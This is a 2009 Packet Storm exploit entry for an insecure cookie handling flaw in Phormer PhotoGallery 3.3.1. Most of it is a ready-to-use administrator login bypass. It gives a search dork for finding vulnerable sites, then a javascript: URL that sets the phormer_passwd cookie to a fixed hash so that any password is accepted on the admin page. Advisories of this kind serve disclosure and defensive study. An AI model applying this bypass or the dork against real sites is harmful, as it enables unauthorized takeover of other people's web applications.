Phormer PhotoGallery 3.3.1 Insecure Cookie

2009-02-03T00:00:00
ID PACKETSTORM:74599
Type packetstorm
Reporter Hussin X
Modified 2009-02-03T00:00:00

Description

                                        
                                            ` Exploit Code :   
  
Phormer PhotoGallery 3.3.1 Insecure Cookie Handling Vulnerability  
  
___________________________________  
  
Author: Hussin X  
  
Home : www.IQ-TY.com & www.TrYaG.cc  
  
Mail : darKangeL_G85@Yahoo.CoM  
___________________________________  
  
script : http://p.horm.org/er  
  
DorK:"This PhotoGallery is powered by Phormer"  
  
  
  
exploiT:  
  
go to admin page  
www.site.com/admin.php  
  
exploiT in url :  
  
javascript:document.cookie="phormer_passwd=21232f297a57a5a743894a0e4a801fc3  
";  
  
Now Back to the admin page  
Administrator's password: = Anything  
Login..... :D  
  
  
  
  
Greetz : all Members IQ-SecuritY www.iq-ty.com | TrYaG www.tryag.cc |  
all IRaQis and arab  
  
`